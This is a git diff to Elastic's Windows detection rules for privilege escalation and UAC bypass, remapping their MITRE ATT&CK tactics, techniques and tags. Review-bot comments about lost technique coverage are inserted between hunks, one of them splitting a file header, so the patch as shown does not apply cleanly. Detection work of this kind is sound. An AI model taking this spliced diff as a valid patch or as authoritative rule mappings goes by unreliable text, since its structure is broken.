"https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml index e411a855b25..558c245bdf1 100644 --- a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml +++ b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/26" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,19 +92,13 @@ registry.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml index 2f73a8e24e7..72e4b92d865 100644 --- a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml +++ b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/12" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -60,18 +60,7 @@ references = [ risk_score = 73 rule_id = "bdcf646b-08d4-492c-870a-6c04e3700034" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Use Case: Vulnerability", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Vulnerability", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -84,36 +73,13 @@ iam where host.os.type == "windows" and event.action == "renamed-user-account" a [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml index c2d36fb1b78..71c3a72deec 100644 --- a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml +++ b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -88,20 +88,7 @@ references = ["https://www.elastic.co/security-labs/invisible-miners-unveiling-g risk_score = 21 rule_id = "e8571d5f-bea1-46c2-9f56-998de2d3ed95" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -120,73 +107,54 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = 
"https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - - +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml index db144eec549..e3e21e88119 100644 --- a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml +++ b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
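Review bot: The rewritten Execution entry keeps only T1569.002 and drops T1059 with its PowerShell, Windows Command Shell and Visual Basic subtechniques, even though the rule (per its name and the `process where ... event.type == "start"` hunk context) fires on script interpreters spawned by the service control manager. T1569.002 describes the service start, while T1059.x describes what actually ran, so keeping both under TA0002 would preserve technique-level coverage reporting. If the intent across this patch is a single technique family per tactic entry, a sentence in the PR description saying so would spare the next reader this question.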
@@ -87,24 +87,13 @@ iam where host.os.type == "windows" and event.action == "changed-computer-accoun [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_takeover_new_source_ip.toml b/rules/windows/privilege_escalation_takeover_new_source_ip.toml index dc2dae8d80a..e072fc82581 100644 --- a/rules/windows/privilege_escalation_takeover_new_source_ip.toml +++ b/rules/windows/privilege_escalation_takeover_new_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -43,14 +43,7 @@ references = ["https://attack.mitre.org/techniques/T1078/"] risk_score = 47 rule_id = "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" 
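Review bot: `rule_id = "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d"` in the context lines of the takeover_new_source_ip tags hunk reads like a hand-typed hex sequence rather than a generated UUID; since this commit already touches the rule, it is worth confirming the id came from the usual generator, as a predictable id invites collisions with other rules built the same way. The `updated_date` in that file's earlier hunk moves to `2026/03/24` while every other rule in this patch is stamped `2026/03/23`, which is harmless if the edit really happened a day later and a copy slip otherwise. The tags now carry Initial Access and Lateral Movement with no Privilege Escalation, so the `privilege_escalation_` file prefix no longer matches the rule's tactics.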
@@ -76,14 +69,26 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml b/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml index 2e44d0cbfe5..72e8665edce 100644 --- a/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml +++ b/rules/windows/privilege_escalation_thread_cpu_priority_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,16 +79,3 @@ winlog.event_data.AccessMask:"512" and not winlog.event_data.SubjectUserSid:("S- ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml index 1ca881499f0..09fe973b8d6 100644 --- a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml 
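Review bot: Deleting the only `[[rule.threat]]` table leaves thread_cpu_priority_hijack with no ATT&CK mapping at all, which is unusual for a `maturity = "production"` rule in this repo and removes it from tactic/technique coverage reporting. That file's tags hunk is not in this view; if `Tactic: Privilege Escalation` is still present there, the repository's tactic/tag consistency tests would flag the mismatch, so that hunk needs checking. If the detection genuinely fits no ATT&CK technique, a sentence in the rule description explaining why no mapping applies would stop the next maintainer from re-adding one.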
+++ b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,14 +75,7 @@ Token Right Adjusted Events (Success) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -120,14 +113,26 @@ any where host.os.type == "windows" and event.provider: "Microsoft-Windows-Secur [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml index 4f92ccdc7c3..4d2045a1f8c 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -88,53 +88,54 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml index 97b2898d655..3120f529e85 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ references = ["https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comaut risk_score = 47 rule_id = "fc7c0fa4-8f03-4b3e-8336-c5feab0be022" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -91,53 +78,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" -[[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml index cc5a3e44aa3..beff616928a 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml 
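Review bot: The Execution entry removed here takes the `T1559.001 Component Object Model` sub-technique with it, the icmluautil hunk drops the same sub-technique, and the diskcleanup_hijack hunk drops `T1053.005 Scheduled Task`; nothing in the commit explains the lost technique coverage. The tactic removal itself is coherent, since `Tactic: Execution` goes in the matching tags hunk and T1559/T1053 only sit under Execution in ATT&CK, so they cannot stay once that tactic is gone. Both COM rules are named after COM-based elevation, however, and the icmluautil description still opens with "The ICMLuaUtil Elevated COM Interface", so if the queries continue to key on the COM broker spawning the elevated child, analysts lose the technique context that pointed at it. A sentence in the PR description stating that these techniques were judged out of scope for what the rules actually detect would close that gap.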
+++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,19 +59,7 @@ The ICMLuaUtil Elevated COM Interface is a Windows component that facilitates Us risk_score = 73 rule_id = "68d56fdc-7ffa-4419-8e95-81641bd6f845" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -85,53 +73,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" -[[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml index 8763bfd5251..b02c911f5c6 100644 --- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml 
+++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,22 +64,7 @@ User Account Control (UAC) is a security feature in Windows that helps prevent u risk_score = 47 rule_id = "1dcc51f6-ba26-49e7-9ef4-2655abb2361e" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -101,53 +86,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml index db0e8042ad4..993c7e84c77 100644 --- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml +++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -92,46 +92,46 @@ file where host.os.type == "windows" and event.type : "change" and process.name [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml index c9cd1c4a1bb..96e8ff9eab2 100644 
